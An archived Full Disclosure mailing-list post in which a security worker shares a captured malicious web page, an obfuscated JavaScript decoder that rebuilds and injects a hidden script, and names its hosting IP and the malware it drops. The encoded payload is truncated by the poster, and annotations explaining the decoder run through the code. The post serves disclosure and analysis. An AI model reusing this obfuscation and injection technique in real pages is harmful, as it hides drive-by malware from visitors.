
Full Disclosure mailing list archives

Some nice code yust captured
From: Stephan Gerling <SGerling () RosenInspection net>
Date: Mon, 22 Feb 2010 15:12:26 +0100

Dear all,
I just received a report from a worried user about something strange on his computer.
I investigated and found this script.


----------------------from the index.html-------------------------------

/* Styles the element with id "alert": a 434x332 box, absolutely positioned and stacked
   above normal content (z-index 1300), whose background is the image alert.gif.
   display:none keeps it hidden until something changes that property; cursor:hand is the
   old IE-only spelling of the pointer cursor.
   NOTE(review): presumably a fake alert dialog revealed by the decoded script; nothing in
   this excerpt shows it being displayed, so confirm against the full page. */
#alert {
        z-index:1300;
        width:434px;
        height:332px;
        position:absolute;
        display:none;
        cursor:hand;
        background:url(/res/1/1/images/alert.gif);
}       </style>

        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
        <title></title>

        <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js";></script>
        <script type="text/javascript">
        // Substitution table used by f2c2a2ff7f(): the 52 letters a-z and A-Z, each once, in shuffled order.
        // z2c2a2ff (9) is the number of positions f2c2a2ff7f() steps back in this table for each letter.
        var y2c2a2ff = 
["s","x","Z","f","B","U","X","J","W","N","c","C","O","G","T","I","P","S","D","h","F","k","Q","y","u","w","b","r","o","j","q","l","m","t","z","A","E","i","M","L","p","n","g","Y","e","V","R","v","H","a","d","K"],
 z2c2a2ff = 9;
        // File name whose ".jpg" suffix the decoder stub rewrites to ".php" before decoding starts.
        // NOTE(review): nothing in this excerpt reads the rewritten name; presumably the decoded payload does.
        var dl_d7e9ccb94 = 'd_d7e9cc.jpg';

        // cc and ee are not read anywhere in the excerpt shown here.
        var cc = 1, ee = 1;


        // Decoder stub of the captured page. It rebuilds a hidden markup string and writes it into the document:
        // decimal character codes -> characters -> HTML-entity unescape -> letter substitution -> document.write().
        (function() {

                // Rewrites the global file name from "d_d7e9cc.jpg" to "d_d7e9cc.php".
                dl_d7e9ccb94 = dl_d7e9ccb94.replace(/\.jpg/, '.php');
                var temp="",i,pass2 = "",sou="";
                // Encoded payload: decimal character codes, each terminated by the marker ")^$,".
                // The poster removed the middle of this literal; the "cut off" lines inside it are his notes, not script text.
                // The leading codes 60,78,104,69,82,97,103,32 are the characters "<", "NhERag" and a space. With the table
                // and shift declared above, f2c2a2ff7f() maps "NhERag" to "script", so the written payload opens with a
                // script tag; the trailing codes 78,...,103,62 ("NhERag" then ">") close one.
                var x2c2a = "60)^$,78)^$,104)^$,69)^$,82)^$,97)^$,103)^$,32)^$,103)^$,10
-----cut off------
seems like ascii codes
/-------cut off------
Continue of the script
78)^$,104)^$,69)^$,82)^$,97)^$,103)^$,62)^$,";
                // Split on the marker to get one code string per character.
                temp = x2c2a.split(")^$,");
                // for...in walks the array's index keys; fromCharCode coerces each code string to a number.
                for (var i in temp) {
                        pass2 += String.fromCharCode(temp[i]);
                }

                // Un-escape four HTML entities; this runs on the text before the letter substitution is undone.
                pass2 = pass2.replace(/\&amp;/g,'&');
                pass2 = pass2.replace(/\&lt;/g,'<');
                pass2 = pass2.replace(/\&gt;/g,'>');
                pass2 = pass2.replace(/\&quot;/g,'"');

                // pass1 is never used in the visible code.
                var pass1 = "";
                temp = pass2.split("");
                // Pass every character through the substitution table; characters outside the table are kept as they are.
                for (var i in temp) {
                        sou += f2c2a2ff7f(temp[i]);
                }

                // Writes the decoded markup into the page while it is still being parsed, so a script element
                // inside it is executed by the browser. For analysis, the value of sou at this point is the
                // artifact to extract and inspect as text.
                document.write(sou);

        })();

        /**
         * Maps one character through the substitution table y2c2a2ff.
         * A character found in the table is replaced by the entry z2c2a2ff positions earlier,
         * wrapping around from the start of the table to its end; any other character
         * (digits, punctuation, whitespace) is returned unchanged.
         * With the table and shift declared on this page (52 letters, shift 9), the letters
         * "N","h","E","R","a","g" come out as "s","c","r","i","p","t".
         *
         * @param {string} s_in - single character to translate
         * @returns {string} the substituted letter, or s_in itself when it is not in the table
         */
        function f2c2a2ff7f(s_in){
                // $.inArray is jQuery's array search; it returns -1 when s_in is not in the table.
                var index = $.inArray(s_in, y2c2a2ff);
                if(index >= 0){
                        // Step back by the shift; a negative result wraps to the end of the table.
                        var new_index = (index - z2c2a2ff) < 0 ? y2c2a2ff.length - (z2c2a2ff - index) : index - 
z2c2a2ff;
                        return y2c2a2ff[new_index];
                }
                return s_in;
        }


        </script>
        <script type="text/javascript">
        // Registers two jQuery plugin methods, disableTextSelect() and enableTextSelect(), choosing the
        // implementation once from jQuery's user-agent flags ($.browser).
        // NOTE(review): nothing in this excerpt calls either method; presumably the decoded payload uses them
        // to stop the visitor from selecting text on the page. Confirm against the decoded payload.
        (function($) {
            if ($.browser.mozilla) {
                // Gecko: switch selection off and on through the MozUserSelect style property.
                $.fn.disableTextSelect = function() {
                    return this.each(function() {
                        $(this).css({
                            'MozUserSelect' : 'none'
                        });
                    });
                };
                $.fn.enableTextSelect = function() {
                    return this.each(function() {
                        $(this).css({
                            'MozUserSelect' : ''
                        });
                    });
                };
            } else if ($.browser.msie) {
                // Internet Explorer: cancel the selectstart event. The ".disableTextSelect" suffix is a jQuery
                // event namespace, so the matching unbind removes only this handler.
                $.fn.disableTextSelect = function() {
                    return this.each(function() {
                        $(this).bind('selectstart.disableTextSelect', function() {
                            return false;
                        });
                    });
                };
                $.fn.enableTextSelect = function() {
                    return this.each(function() {
                        $(this).unbind('selectstart.disableTextSelect');
                    });
                };
            } else {
                // Every other browser: cancel mousedown on the element. Returning false from a jQuery handler
                // prevents the default action and stops propagation.
                $.fn.disableTextSelect = function() {
                    return this.each(function() {
                        $(this).bind('mousedown.disableTextSelect', function() {
                            return false;
                        });
                    });
                };
                $.fn.enableTextSelect = function() {
                    return this.each(function() {
                        $(this).unbind('mousedown.disableTextSelect');
                    });
                };
            }
        })(jQuery);
        </script>
        </head>
        <body>

        </body>
        </html>



If you open this web page (http : / / 217.23.5.205 / index.ht......),
you will be infected with Virus/Malware: Cryp_Krap-9


Best regards,

Stephan Gerling


May the force be with you
-------------------------
Obi-Wan

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

